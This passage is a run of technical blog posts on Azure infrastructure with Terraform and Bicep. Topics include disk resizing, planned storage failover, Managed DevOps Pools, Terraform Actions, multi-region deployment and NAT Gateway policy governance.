filesystem. For Windows, use Disk Management or `diskpart`. For Linux, lean on `growpart` plus `resize2fs` or `xfs_growfs`, depending on your setup. Consider building these commands into your provisioning scripts for a bit more polish. ## More wins for team DevOps Going downtime-free means you strengthen SLAs and provide proper availability for business-critical environments. Disk management effortlessly fits into declarative pipelines, so you can scale infrastructure without crossing your fingers or juggling maintenance windows. If you haven't upgraded, the process is simple: move up to AzureRM v4.53.0+, test on non-production, script out the partition expansion and get back to building value rather than coordinating reboots. This update is a clear step forward for those keen on automation, cloud-native best practice and getting the most out of Azure. Your storage now scales at the pace of your workloads, with zero interruptions. ## Useful Resources Before I go, here are some useful links and resources to support readers who want to dive deeper into managed disk expansion, Terraform and Azure infrastructure best practices: - [Official Terraform AzureRM Provider Documentation](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/managed_disk) - A comprehensive guide on how to use `azurerm_managed_disk` with examples and parameters. - [Azure Ultra Disk Storage Overview](https://learn.microsoft.com/en-us/azure/virtual-machines/disks-types#ultra-disks) - Details on Ultra Disks capabilities, performance and best use cases. - [Managed Disks resizing documentation on Azure](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/expand-managed-disks) - How to expand managed disks in Azure including tips on partition resizing. - [Terraform blog on recent AzureRM Provider updates](https://www.hashicorp.com/blog/terraform-azure-provider-new-features) - Keep up with the latest provider versions and feature support including live resizing disks. - [Handling disk resizing and partition expansion in Linux](https://www.tecmint.com/resize-root-filesystem-partition-in-linux/) - Detailed steps for growing Linux partitions and filesystems after disk expansion. - [Microsoft Docs on disk management in Windows Server](https://learn.microsoft.com/en-us/windows-server/storage/disk-management/disk-management) - Useful reference for managing disk partitions and expanding volumes with Disk Management and diskpart. --- # Planned Failover for Azure Storage: Cloud DR on Your Terms - URL: https://blog.l-w.tech/blog/2025-11-13-Azure-Storage-Planned-Failover - Date: 2025-11-13 - Author: Elliott Leighton-Woodruff - Tags: Azure, Azure Storage, Disaster Recovery, Terraform, Azure DevOps, Infrastructure as Code, GRS, GZRS, Cloud Resilience, Automation Azure Storage's Planned Failover transforms disaster recovery from reactive hoping to proactive testing and validation of your DR strategy. Azure Storage's Planned Failover feature delivers a significant leap forward in disaster recovery (DR) planning. Unlike traditional geo-redundant storage (GRS) where failover happens only during outages, planned failover enables you to proactively trigger and test failover between primary and secondary regions. I've had to defend the fact this hasn't been possible (using the readonly endpoint to prove it) in the past but frankly it's a requirement for me and my clients. This capability is essential for organisations that need confidence, not just hope, that the DR plans will work when disaster strikes. ## What's a planned failover? Planned failover allows you to manually promote your storage account's secondary region to primary, swapping roles without waiting for an actual outage. This is useful for: - **Scheduled DR drills** to validate failover readiness - **Proactive regional migrations** due to expected issues - **Ensuring production resilience** through routine failover rehearsals Microsoft currently supports planned failover in preview in all public Azure regions supporting GRS and GZRS redundancy.... excluding West India & Switzerland West. ## IaC and DevOps Pipeline Integration Considerations ### Terraform Role Terraform handles deploying the storage account with geo-redundancy enabled: ```hcl resource "azurerm_storage_account" "main" { name = var.storage_account_name location = var.primary_region resource_group_name = var.resource_group_name account_tier = "Standard" account_replication_type = "GZRS" } ``` Terraform does not trigger failovers itself; this remains an operational action outside declarative IaC. ### Azure DevOps Pipeline Steps to Automate Planned Failover **1 - Pre-Failover Validation** Ensure storage and application readiness (health checks, replication status). **2 - Trigger Planned Failover via Azure CLI** Add an inline script task: ```yaml - task: AzureCLI@2 inputs: azureSubscription: 'MyAzureSubscription' scriptType: 'bash' scriptLocation: 'inlineScript' inlineScript: | az storage account failover \ --resource-group $(ResourceGroup) \ --name $(StorageAccountName) \ --failover-type planned ``` **3 - Post-Failover Validation** Run connectivity and data integrity tests to confirm failover success and application readiness. **4 - Monitoring & Manual Rollback** Because automated rollback (fail back) isn't currently supported, manual review and actions should be documented. ## Important Considerations - **Data Loss**: Planned failover assumes both endpoints are available and avoids data loss, unplanned failover can incur data loss due to asynchronous replication lag. - **Failover Duration**: Typically completes in under an hour but depends on account size and current load. - **Feature Limitations**: Not supported for some premium storage types, NFSv3 or Azure File Sync. - **Fail back**: Currently, fail back isn't automated and must be managed manually. - **Compliance & Audit**: Integrating planned failovers into your CI/CD pipelines with automated verification improves audit readiness. ## Why this matters for cloud resilience Failover isn't about waiting for disaster and hoping for the best anymore. With planned failover, you can prove your DR plan regularly, demonstrate compliance with regulatory requirements and reduce downtime risk through automation. The combination of Terraform for infrastructure provisioning and Azure DevOps for operational orchestration means you can include failover testing as a first-class citizen in your cloud automation strategy. --- # Deploying Managed DevOps Pools with Terraform - URL: https://blog.l-w.tech/blog/2025-10-29-Managed-DevOps-Pools-Terraform - Date: 2025-10-29 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Azure DevOps, Managed DevOps Pools, Infrastructure as Code, CI/CD, DevOps, Automation, Networking Build scalable, secure Azure DevOps agent pools with Microsoft-managed infrastructure using Terraform and Azure Verified Modules. ## What are Managed DevOps Pools? Managed DevOps Pools are a modern evolution for running build and deployment agents in Azure DevOps. Instead of managing the underlying virtual machines (VMs) or containers yourself, Microsoft handles the infrastructure on your behalf. This means your agents run on virtual machines provisioned and patched by Microsoft, within Microsoft-owned Azure subscriptions, but the pool is administered from your Azure estate. You get the power to choose images, VM sizes, regions, networking and agent state without the headache of maintenance, scaling or patching. ### Key advantages: - **Customisable agents**: Choose Microsoft images, marketplace images or custom VM images for your CI/CD productivity. - **Network integration**: Agents can connect to your virtual networks, so your pipelines reach enterprise resources securely. You get to enforce your own DNS, routing, network security groups (NSGs) and firewalls for the pools. - **Resilient scaling**: Microsoft manages resource scaling, patching and hardware lifecycle for you and your pool can quickly scale from quiet to thousands of concurrent agents when pipelines need it. - **Unified experience**: Leverage multiple DevOps organisations and projects, isolating workloads as necessary but all under one consistent deployment paradigm. - **Stateful options**: Build caches can persist for up to seven days to speed up subsequent jobs and long-running pipelines can run for up to 48 hours. - **Cost-efficient**: Pay only for what you use, at standard Azure VM and network rates. ## How Do They Work in Azure DevOps? Managed DevOps Pools are surfaced in Azure as a resource in your subscription, but the agent VMs run in protected Microsoft environments. You set policies and connectivity by delegating a subnet in your chosen virtual network (VNet), or use a Microsoft-provided network for full isolation. Agents in the pool register to your Azure DevOps organisation just like self-hosted VMs but require no maintenance overhead. The "hosted on behalf of you" architecture allows Microsoft to deliver these pools 'as-a-service'; your responsibility is the connection policy and operational lifecycle, not operating system patching or VM reimaging. This fundamentally changes DevOps operations in highly governed environments like finance or the public sector, since you can deliver self-service pools without governance headaches. ## Building Your Managed Pool with Terraform This walkthrough uses a modular, robust Terraform approach suitable for real-world, multi-environment scenarios in Azure UK. It's built for scale, compliance and maintainability and integrates deeply with your internal network and security policies. This solution relies on the Azure Verified Module for Azure Managed DevOps Pool which makes this possible, without it you'd need to rely on `azapi_resource` as the resources aren't yet available within the Azure Provider. ### 1. Directory and File Structure Organise your Terraform configuration with clear responsibility for each file: ``` . ├── backend.tf ├── main.tf ├── providers.tf ├── locals.tf ├── data.tf ├── tf-reqs.tf ├── ado_resource_register.tf ├── ado_project.tf ├── dev_center.tf ├── dev_center_project.tf ├── afwrcg_managed_ado_agents.tf ``` ### 2. Providers, Backend and Requirements **providers.tf** Set up Azure and Azure DevOps providers, including support for cross-subscription scenarios using aliases. ```hcl provider "azurerm" { features {} tenant_id = var.tenant_id subscription_id = var.subscription_id } provider "azurerm" { alias = "connectivity" subscription_id = var.connectivity_subscription_id features {} } provider "azuredevops" { personal_access_token = var.azure_devops_pat org_service_url = local.azure_devops_organization_url } ``` **backend.tf and tf-reqs.tf** Store state in a remote backend (such as Azure Storage) and lock provider versions. ```hcl terraform { backend "azurerm" { ... } required_version = ">= 1.4.0" required_providers { azurerm = ">= 3.64.0" azuredevops = ">= 1.0.0" } } ``` ### 3. Locals and Variable Management **locals.tf** Maintain environment, location and naming logic: ```hcl locals { environment_map = { "Production" = "prod" "NonProd" = "nprd" // Add as needed... } location_map = { "UK South" = "uks" // Add as needed... } short_environment = lookup(local.environment_map, var.environment, "default") short_location = lookup(local.location_map, var.location, "default") azure_devops_organization_url = "https://dev.azure.com/${var.azure_devops_organization_name}" resource_providers_to_register = { dev_center = { resource_provider="Microsoft.DevCenter" } devops_infrastructure = { resource_provider="Microsoft.DevOpsInfrastructure" } } } ``` ### 4. Data Sources **data.tf** Fetch live resource details, ensuring configuration reflects actual infra: ```hcl data "azurerm_client_config" "current" {} data "azurerm_virtual_network" "main" { name = var.app_vnet_name resource_group_name = var.app_vnet_rg } data "azurerm_subnet" "servers" { name = "snet-servers" virtual_network_name = data.azurerm_virtual_network.main.name resource_group_name = data.azurerm_virtual_network.main.resource_group_name } data "azurerm_firewall_policy" "main" { provider = azurerm.connectivity name = "${var.short_client_name}-afwp-prod-gbl-001" resource_group_name = "${var.short_client_name}-rg-afwp-gbl-001" } ``` ### 5. Resource Provider Registration **ado_resource_register.tf** Automate resource provider registration. ```hcl resource "azapi_resource_action" "resource_provider_registration" { for_each = local.resource_providers_to_register action = "providers/${each.value.resource_provider}/register" method = "POST" resource_id = "/subscriptions/${data.azurerm_client_config.current.subscription_id}" type = "Microsoft.Resources/subscriptions@2021-04-01" } ``` ### 6. Role Definitions and Assignments **ado_project.tf** Tightly scoped roles ensure only the required permissions: ```hcl resource "azurerm_role_definition" "main" { name = "Virtual Network Contributor for DevOpsInfrastructure" scope = data.azurerm_virtual_network.main.id permissions { actions = [ "Microsoft.Network/virtualNetworks/subnets/join/action", "Microsoft.Network/virtualNetworks/subnets/serviceAssociationLinks/validate/action", "Microsoft.Network/virtualNetworks/subnets/serviceAssociationLinks/write", "Microsoft.Network/virtualNetworks/subnets/serviceAssociationLinks/delete" ] } } resource "azurerm_role_assignment" "subnet_join" { principal_id = data.azuread_service_principal.main.object_id role_definition_id = azurerm_role_definition.main.role_definition_resource_id scope = data.azurerm_virtual_network.main.id } ``` ### 7. Dev Center and Project **dev_center.tf and dev_center_project.tf** Provision the core resources for Managed DevOps Pool connectivity. ```hcl resource "azurerm_dev_center" "main" { name = "${var.short_client_name}-ado-dc-${local.short_environment}-${local.short_location}-001" resource_group_name = azurerm_resource_group.main.name location = azurerm_resource_group.main.location identity { type = "SystemAssigned" } tags = var.tags } resource "azurerm_dev_center_project" "main" { name = "${var.short_client_name}-ado-dcp-${local.short_environment}-${local.short_location}-001" resource_group_name = azurerm_resource_group.main.name location = azurerm_resource_group.main.location dev_center_id = azurerm_dev_center.main.id tags = var.tags } ``` ### 8. Controlled Networking The advanced pool setup integrates with existing VNets and subnets, so agents join the enterprise network securely. Firewall policies govern all egress and ingress traffic. - **Outbound rules**: Only allow necessary DevOps endpoints, Ubuntu, NuGet, Docker feeds, Azure platform endpoints and Microsoft SaaS URLs. - **Isolation**: Block all non-approved destinations, enforce private DNS and routing controls. **afwrcg_1900_managed_ado_agents.tf** Craft network and application-level firewall rules for agents. ```hcl resource "azurerm_firewall_policy_rule_collection_group" "azure_devops_agents" { name = "Managed_DevOps_Agents" firewall_policy_id = data.azurerm_firewall_policy.main.id priority = 1900 network_rule_collection { ... } application_rule_collection { ... } } ``` Rules should allow only required endpoints such as DevOps services, feeds, relays, authentication and OS package mirrors. ### 9. Deploy the Managed Pool Resource groups, Dev Center and project resources are provisioned and connected, with waits for networking health. Only once the VNet link and DNS are validated is the pool deployed, preventing common connectivity issues. Resource tagging, environment contextualisation and dependency ordering are all handled through module dependencies and variables. **main.tf** Wire all the modules, resources and connectivity together. ```hcl module "managed_devops_pool" { source = "Azure/avm-res-devopsinfrastructure-pool/azurerm" version = "0.3.1" dev_center_project_resource_id = azurerm_dev_center_project.main.id location = azurerm_resource_group.main.location name = "${var.short_client_name}-mdop-${local.short_environment}-${local.short_location}-001" resource_group_name = azurerm_resource_group.main.name enable_telemetry = false organization_profile = { organizations = [{ name = var.azure_devops_organization_name projects = [] }] } subnet_id = data.azurerm_subnet.servers.id tags = var.tags depends_on = [ azapi_resource_action.resource_provider_registration ] } ``` ### 10. Apply and Operate Initialise and deploy with: ```bash terraform init terraform plan terraform apply ``` Monitor via Azure Portal and Azure DevOps, adjusting tags, networking, concurrency or images as needed. ## Summary This end-to-end, modular approach lets you securely manage CI/CD infrastructure in Azure, meeting the requirements of even the most demanding UK enterprises. Just update local variables to expand into new environments and enjoy consistent, secure and maintainable DevOps pipelines from day one. --- # Terraform Actions: Post Deployment Control for Azure - URL: https://blog.l-w.tech/blog/2025-10-15-Terraform-Actions-Azure - Date: 2025-10-15 - Author: Elliott Leighton-Woodruff - Tags: Terraform, Azure, Infrastructure as Code, Terraform Actions, HashiConf, DevOps, Automation, Cloud Management Terraform 1.14 introduces Actions a native way to handle post-deployment operations like VM power control without resorting to provisioners or workarounds. Terraform is my go to for getting resources built in the cloud, it provides a seemingly endless supply of providers and configuration support for almost everything in Azure today but sometimes there's a need to go further. If you've used Terraform day to day designing and building product you'll know its limitations, sometimes we'll skirt past these with provisioners, null_resource or azapi and this works well but it's far more complicated that using predefined resources from the registry. This is where 'Terraform Actions' comes in, announced at HashiConf 2025 and available from Terraform 1.14 onwards, actions let you perform operations that go beyond standard resource deployment. Think stopping a virtual machine gracefully, invalidating a cache\* or triggering a workflow\*. These are state changing operations that don't fit neatly into the CRUD model but are essential parts of managing real-world infrastructure. The key difference is that actions don't create resources that Terraform then tracks forever. They execute an operation and that's it. You might invoke an action manually when you need it or configure it to trigger automatically when a resource is created or updated. ## So why bother? If you've been using Terraform for a while you might be thinking "can't I just use a provisioner with a local-exec to run a script?" Technically yes, but provisioners have always been a bit of a workaround. HashiCorp themselves have been pretty clear that provisioners should be a last resort. Actions give you a way to handle these operations properly. Instead of writing shell scripts that call Azure CLI commands, you define an action block in your Terraform configuration. The provider handles the implementation details and you get proper error handling, retry logic and integration with Terraform's planning workflow. Actions also show up in your terraform plan output so you can see what operations will be triggered before you run apply. That visibility is huge when you're working in a team and need to understand the full scope of what's about to happen to your infrastructure. ## Try it on for size Today Terraform Actions is brand new and in the Azure space its use is super limited but this gives us a glimpse into what the future of terraform looks like. The Azure provider has started rolling out actions support with the `azurerm_virtual_machine_power` action being the first. [Azure Provider Virtual Machine Power Action](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/actions/virtual_machine_power) This action allows use to control the power state of the deploy resources, it might seem trivial but deploying at scale before resources are required could be costing you money within your development. This was a task I would previously just called a command for but now we can bake it in and leverage all of the benefits of a well oiled terraform codebase. ### 1. Setup your Terraform provider First you need to configure the Azure provider. Make sure you're using a version that supports actions. Create a file called `_providers.tf`: ```hcl terraform { required_version = ">= 1.14.0" required_providers { azurerm = { source = "hashicorp/azurerm" version = "~> 4.0" } } } provider "azurerm" { features {} } ``` ### 2. Define your Azure resources Now let's create the actual infrastructure. Create a `main.tf` file with a resource group, virtual network and the VM itself: ```hcl resource "azurerm_resource_group" "dev" { name = "dev-resources-rg" location = "UK South" } resource "azurerm_virtual_network" "dev" { name = "dev-vnet" address_space = ["10.0.0.0/16"] location = azurerm_resource_group.dev.location resource_group_name = azurerm_resource_group.dev.name } resource "azurerm_subnet" "dev" { name = "internal" resource_group_name = azurerm_resource_group.dev.name virtual_network_name = azurerm_virtual_network.dev.name address_prefixes = ["10.0.1.0/24"] } resource "azurerm_network_interface" "dev" { name = "dev-nic" location = azurerm_resource_group.dev.location resource_group_name = azurerm_resource_group.dev.name ip_configuration { name = "internal" subnet_id = azurerm_subnet.dev.id private_ip_address_allocation = "Dynamic" } } resource "azurerm_linux_virtual_machine" "dev" { name = "dev-vm" resource_group_name = azurerm_resource_group.dev.name location = azurerm_resource_group.dev.location size = "Standard_B2s" admin_username = "azureuser" network_interface_ids = [ azurerm_network_interface.dev.id, ] admin_ssh_key { username = "azureuser" public_key = file("~/.ssh/id_rsa.pub") } os_disk { caching = "ReadWrite" storage_account_type = "Standard_LRS" } source_image_reference { publisher = "Canonical" offer = "0001-com-ubuntu-server-jammy" sku = "22_04-lts" version = "latest" } lifecycle { action_trigger { events = [after_create] actions = [action.azurerm_virtual_machine_power.stop_dev_vm] } } } ``` The `action_trigger` block sits inside the lifecycle block that you might already be familiar with from lifecycle rules like `create_before_destroy` or `prevent_destroy`. You specify which lifecycle events should trigger the action using the `events` argument. Available events are `before_create`, `after_create`, `before_update` and `after_update`. In this case we want to stop the VM after it's been created so we use `after_create`. The `actions` argument takes a list of action addresses using the format `action..`. You can trigger multiple actions from the same event if needed. ### 3. Define the action Now here's where it gets interesting. Add an action block to configure what should happen after the VM is created: ```hcl action "azurerm_virtual_machine_power" "stop_dev_vm" { config { virtual_machine_id = azurerm_linux_virtual_machine.dev.id power_state = "power_off" } } ``` The action block has a type (in this case `azurerm_virtual_machine_power`) and a symbolic name (`stop_dev_vm`). Inside the config block you specify the VM you want to control using its resource ID and the desired power state. The action references the VM resource through `azurerm_linux_virtual_machine.dev.id`. Terraform understands this dependency and knows the action can only run after the VM exists. ### 4. Plan & Apply When you run the plan you'll see the actions are listed separately indicating the changes that will take place: ``` Terraform will invoke the following action(s) after this change: # action.azurerm_virtual_machine_power.stop_dev_vm will be invoked action "azurerm_virtual_machine_power" "stop_dev_vm" { config { virtual_machine_id = (known after apply) power_state = "power_off" } } ``` ## The limitations It's brand new..... there's a single resource right now (you can bet this will be developed quickly) and you can't create dependencies for now. If you want a resource to only be created after an action completes, you can't express that directly. The action runs as part of the resource's lifecycle but subsequent resources can start provisioning in parallel with the action. ## Is this groundbreaking right now? Maybe not.. Does it show you where Terraform is going, open new possibilities to do more with less time? Absolutely. The real power comes from binding actions to resource lifecycles. Instead of running separate commands after your Terraform apply completes, you encode the full workflow in your configuration. When you run terraform plan you see both the resource changes and the actions that will trigger. As more providers implement actions and the feature matures, I expect we'll see actions become a standard part of Terraform workflows. For now, if you're on Terraform 1.14 or later and working with Azure, have a look at what actions are available and consider how they might simplify your deployment processes. --- # Podcast | Platform Engineering: Why 'A Platform' Beats 'More Servers' - URL: https://blog.l-w.tech/blog/2025-10-06-Platform-Engineering-Azure-Landing-Zones - Date: 2025-10-06 - Author: Elliott Leighton-Woodruff - Tags: Azure, Platform Engineering, Landing Zones, FinOps, Cost Optimization, PaaS, DevOps, Podcast, AI Discussing Azure landing zones, FinOps, PaaS-first strategies, and AI agents with Alec on Engineer In The Loop. Had a brilliant time chatting with Alec on Engineer In The Loop about why "a platform" beats "more servers" once you care about speed, safety and spend. ## What We Covered ### Azure Landing Zones in Practice What an Azure landing zone actually is in practice—governance, networking, RBAC and policy—and how good platform ops lets teams ship without fighting the cloud every day. ### FinOps: Keeping Costs Sane Using FinOps thinking, budgets and anomaly alerts to keep costs sane, plus some real billing war stories from AKS, Log Analytics and AI workloads that grew faster than expected. ### PaaS-First Strategy Why PaaS-first beats VM-first for most organisations, how resource vending and golden templates improve developer experience and how to talk about "cost per transaction" instead of just monthly bill totals. ### AI Agents: Where They Help Where AI agents genuinely help platform teams and where you still need humans in the loop to avoid painful security and reliability mistakes. ## Who This Is For If you are working on Azure landing zones, platform engineering or FinOps, this conversation is packed with practical insights and real-world lessons.

🎙️Catch the Full Episode

Engineer In The Loop - Platform Engineering and Azure Landing Zones

## Key Takeaways - **Platform engineering is about enabling teams** - Not just provisioning infrastructure, but creating self-service capabilities with guardrails - **FinOps starts with visibility** - Budgets and anomaly detection catch runaway costs before they become business problems - **PaaS-first reduces operational burden** - Let Azure manage the infrastructure so your team can focus on value delivery - **Cost per transaction matters more than total spend** - Frame cloud costs in business terms, not just infrastructure metrics - **AI agents augment, they don't replace** - Use them for toil reduction, but keep humans in critical decision loops Building a platform isn't just about deploying infrastructure—it's about creating an environment where teams can move fast without breaking things or breaking the budget. --- # Resilience by Design: Multi-Region Infrastructure as Code That Actually Delivers - URL: https://blog.l-w.tech/blog/2025-09-17-Multi-Region-Resilience-IaC - Date: 2025-09-17 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Infrastructure as Code, Disaster Recovery, Multi-Region, High Availability, Resilience, DevOps, Cloud Architecture The Azure East US 2 outage proved that single-region deployments are gambling. Build multi-region resilience into your IaC from day one, not as an afterthought. The recent 12 hour VM deployment outage in Azure's East US 2 region was a sobering reminder. Two entire availability zones went down, disrupting VM creation, AKS clusters, Databricks, Azure Batch and other dependent services. Teams relying on a single region or limited availability zones found themselves scrambling, not because they expected cloud providers to be infallible, but because their infrastructure wasn't prepared for failure. This is why building resilient cloud infrastructure isn't just a nice-to-have. It's an absolute necessity. ## What Happened and Why It Matters On September 10th, a major Azure incident brought down VM operations in East US 2, affecting multiple zones. Workloads froze and pipelines stalled. Businesses that had all their eggs in one regional basket suddenly realised how fragile their deployments had become. Cloud providers are reliable but not immortal. Outages like these are rare, but they happen. What separates success from chaos is how your infrastructure is designed to respond when the unexpected strikes. ## Multi-Region by Default, Not as an Afterthought If your Infrastructure as Code modules are region-specific or tightly coupled to a particular availability zone, you might as well be gambling. Resilience starts with making multi-region and multi-zone deployment straightforward, repeatable and automated. In my own HA platforms with Terraform, I use: - **Separate workspaces for every region and environment**: `uksprod`, `ukwprod`, `eusprod`, `eus2prod` - **Corresponding `*.tfvars` files** to handle region-specific variables and configurations That means deploying a full environment in a new region is as easy as running: ```bash terraform workspace select uksprod terraform apply -var-file="uksprod.tfvars" ``` Switch the workspace and variable files and you've got a fresh deployment in a different region with zero code changes. ## Actually Deploying Multi-Region ```hcl variable "location" {} variable "environment_name" {} resource "azurerm_resource_group" "main" { name = "${var.environment_name}-rg" location = var.location } # Other resources reference var.location and var.environment_name as needed ``` Parameterising your modules like this means your entire stack flexes effortlessly to the region and environment you target. ## Why This Pattern Is a Game Changer ### Automated Disaster Recovery If East US 2 goes down, redeploy the entire environment in West US or UK South. The infrastructure as code is the same, production-ready and pipeline-driven. ### Speed and Flexibility Want to test if West UK behaves differently? Flip the workspace and run the deployment. No surprise environment differences, no manual setups. Just consistent, repeatable deployments that save hours and avoid outages caused by deployment drift. ### Cloud Migration and Multi-Tenancy This approach isn't just for disaster recovery; it's the backbone of smooth cloud migration and multi-environment management. Use the same code for dev, test, production and all your regions. ## Design Principles to Build Into Your Code - **Parameterise everything**: Location, zone, SKU names, tags—give your modules maximum flexibility. - **Modularise**: Build reusable modules that can deploy entire workloads consistently across regions. - **Separate state**: Use Terraform workspaces or backend state files to isolate region-specific deployments. - **Automate failover**: Define secondary regions and resources in code with conditional expressions or separate pipelines. - **Test regularly**: Actually run disaster recovery drills using your IaC pipelines, not just tabletop exercises. ## Making Resilience Boring (Because That's When It's Working) Resilience shouldn't mean frantic 2 a.m. firefighting or scrambling for last-minute scripts. It means your Infrastructure as Code pipelines and templates have covered the failure scenarios before they arise. The Azure outage was inconvenient, but the outage-recovery process doesn't have to be. With the right multi-region IaC patterns, hitting a regional failure turns from an incident into a routine failover. ## Build for Reality, Not the Slide Deck Cloud outages won't stop happening. Your job is to build infrastructure that assumes failure, adapts quickly and keeps business running normally. The previous "build in one region and hope for the best" model is not viable at scale. Develop robust, parameterised, multi-region-ready IaC today. Your future self and your live environment will thank you. How do you manage multi-region deployments today? What's your go-to strategy for DR automation? Let's share practical tips and code that actually works. --- # Bake Governance into Code Before Azure Retires Default Outbound Access - URL: https://blog.l-w.tech/blog/2025-09-12-Azure-NAT-Gateway-Governance - Date: 2025-09-12 - Author: Elliott Leighton-Woodruff - Tags: Azure, NAT Gateway, Azure Policy, Bicep, Terraform, Networking, Governance, Infrastructure as Code, Security Azure's default outbound internet access retires in March 2026. Build proper network governance with NAT Gateways and Azure Policy before you're forced to scramble. **UPDATE:** As per [Azure updates | Microsoft Azure](https://azure.microsoft.com/en-us/updates/) this change has been delayed and will now go into effect from March 2026, don't waste this blessing—get fixing asap! Psst..... September 30th is around the corner, and Azure's default outbound internet access is about to retire. Instead of scrambling, treat this as your moment to nail down network governance in code. ## Why It Matters Instead of scrambling to bolt on NAT Gateways after the fact (if you don't already leverage NVA's!), this is your chance to build proper network governance into your Infrastructure as Code. And here's what actually works in practice: ### Force NAT Gateway Usage Rather than hoping teams remember to configure outbound connectivity, just make it mandatory: ```json ForceNatGateway = { "mode": "All", "policyRule": { "if": { "allOf": [ { "field": "type", "equals": "Microsoft.Network/virtualNetworks/subnets" }, { "field": "Microsoft.Network/virtualNetworks/subnets/natGateway.id", "exists": false } ] }, "then": { "effect": "audit" } } } ``` Audit first → deny later. ### Block Direct Public IP Assignments Stop VMs from getting direct internet exposure: ```json { "mode": "All", "policyRule": { "if": { "allOf": [ { "field": "type", "equals": "Microsoft.Network/networkInterfaces" }, { "field": "Microsoft.Network/networkInterfaces/ipConfigurations[*].publicIPAddress.id", "exists": true } ] }, "then": { "effect": "deny" } } } ``` This prevents the classic "I'll just add a public IP real quick" workaround that bypasses your security controls. ## Implementation That Actually Works ### Bicep - Infra ```bicep // NAT Gateway with explicit networking param environment string param location string = resourceGroup().location param availabilityZone string = '1' resource publicIp 'Microsoft.Network/publicIPAddresses@2023-09-01' = { name: 'pip-nat-${environment}-${location}' location: location sku: { name: 'Standard' } properties: { publicIPAllocationMethod: 'Static' publicIPAddressVersion: 'IPv4' } } resource natGateway 'Microsoft.Network/natGateways@2023-09-01' = { name: 'nat-${environment}-${location}' location: location sku: { name: 'Standard' } zones: [availabilityZone] properties: { publicIpAddresses: [ { id: publicIp.id } ] idleTimeoutInMinutes: 10 } } ``` ### Bicep - Policy ```bicep // Policy definition resource customNatPolicy 'Microsoft.Authorization/policyDefinitions@2023-04-01' = { name: 'custom-nat-gateway-required' properties: { policyType: 'Custom' displayName: 'Require NAT Gateway for subnets' description: 'This policy ensures all subnets have a NAT Gateway configured' mode: 'All' policyRule = ForceNatGateway } } // Assign the policy resource natGatewayPolicy 'Microsoft.Authorization/policyAssignments@2023-04-01' = { name: 'require-nat-gateway' properties: { displayName: 'Require NAT Gateway for subnets' policyDefinitionId: customNatPolicy.id scope: resourceGroup().id enforcementMode: 'Default' } } ``` ### Terraform - Infra ```hcl # NAT Gateway resource resource "azurerm_nat_gateway" "main" { name = "nat-${var.environment}-${var.location}" location = var.location resource_group_name = var.resource_group_name sku_name = "Standard" zones = [var.availability_zone] idle_timeout_in_minutes = 10 } # Policy assignment resource "azurerm_resource_policy_assignment" "nat_gateway_required" { name = "require-nat-gateway" resource_id = data.azurerm_resource_group.main.id policy_definition_id = azurerm_policy_definition.nat_gateway_required.id parameters = jsonencode({ effect = { value = "audit" } }) } ``` ### Terraform - Policy ```hcl // Create the custom policy definition using the var resource "azurerm_policy_definition" "require_nat_gateway" { name = "custom-nat-gateway-required" policy_type = "Custom" mode = var.ForceNatGateway.mode display_name = "Require NAT Gateway for subnets" description = "Ensures every subnet has an associated NAT Gateway." policy_rule = jsonencode({ if = var.ForceNatGateway.policyRule["if"] then = var.ForceNatGateway.policyRule.then }) } // Assign the custom policy to the resource group resource "azurerm_policy_assignment" "require_nat_gateway" { name = "require-nat-gateway" scope = azurerm_resource_group.main.id display_name = "Require NAT Gateway for subnets" policy_definition_id = azurerm_policy_definition.require_nat_gateway.id enforcement_mode = "Default" } ``` ## Rollout Roadmap - **Phase 1: Discovery** - Deploy audit policies to see what you're working with. Use Resource Graph queries to map your current state. - **Phase 2: New Resources Only** - Switch to deny mode for new deployments while leaving existing stuff alone. This gives teams time to adapt without breaking production. - **Phase 3: Full Migration** - Once you've got new deployments sorted, plan the migration of existing resources. No rush here—existing VMs will keep working. ## Cost Considerations NAT Gateways aren't free, so factor that into your planning. But they're more predictable than the random SNAT port exhaustion issues you get with default outbound access. Plus, you can share one NAT Gateway across multiple subnets, which helps with costs. Consider limiting NAT Gateway SKUs through policy if you're worried about cost creep: ```bicep resource customNatGatewaySkuLimitPolicy 'Microsoft.Authorization/policyDefinitions@2023-04-01' = { name: 'custom-nat-gateway-sku-limit' properties: { policyType: 'Custom' mode: 'Indexed' displayName: 'Limit NAT Gateway to Standard SKU' description: 'Ensures NAT Gateways only use the Standard SKU to control costs and enforce compliance.' policyRule: { if: { field: 'type' equals: 'Microsoft.Network/natGateways' } then: { effect: 'deny' details: { not: { field: 'Microsoft.Network/natGateways/sku.name' in: ['Standard'] } } } } } } resource natGatewayCostPolicy 'Microsoft.Authorization/policyAssignments@2023-04-01' = { name: 'limit-nat-gateway-sku' properties: { displayName: 'Limit NAT Gateway to Standard SKU' policyDefinitionId: customNatGatewaySkuLimitPolicy.id scope: resourceGroup().id enforcementMode: 'Default' } } ``` ## Testing and Validation Don't just deploy policies and hope they work. Test them: ```bash # Deploy a test resource that should violate policy az deployment group create \ --resource-group test-rg \ --template-file test-vm-no-nat.bicep \ --parameters vmName=test-vm-01 # Check if policy caught it az policy state list \ --resource-group test-rg \ --query "[?complianceState=='NonCompliant']" ``` ## The Bigger Picture Microsoft's pushing everyone toward explicit, secure-by-default networking. Teams that get this right now will be ahead of the curve when the next set of changes drops. And there will be more changes. The real win here isn't just compliance with the new rules—it's building networking patterns that are predictable, secure, and actually manageable at scale. Policy-driven infrastructure means fewer surprises and more control over your environment. --- # Instantly Bringing Azure Resources Into Terraform: From ClickOps to IaC in Seconds! - URL: https://blog.l-w.tech/blog/2025-09-05-Azure-Resources-Terraform-Export - Date: 2025-09-05 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Infrastructure as Code, VSCode, IaC, AzureRM, Import, DevOps, Cloud Management Transform legacy Azure resources into version-controlled Terraform code using Microsoft's new VSCode exporter—no more excuses for unmanaged infrastructure. Modern cloud teams want their infrastructure tracked, re-deployable and refactored with confidence. Yet, Azure estates that began life as click-driven or patchwork deployments always risk slipping into the shadows especially as real-world change outpaces documentation (we did that right?....). Welcome Microsoft's new Terraform exporter for VSCode, landing those resources into code (and Terraform state) is now almost absurdly quick. Yes, like actually quick. New to TF or need to quickly protect a resource with IaC? This is the guide for you. ## First, The Pre-Req - AzureTerraform Provider This is non-negotiable. Before any exporting magic can occur, the Azure subscription must have the 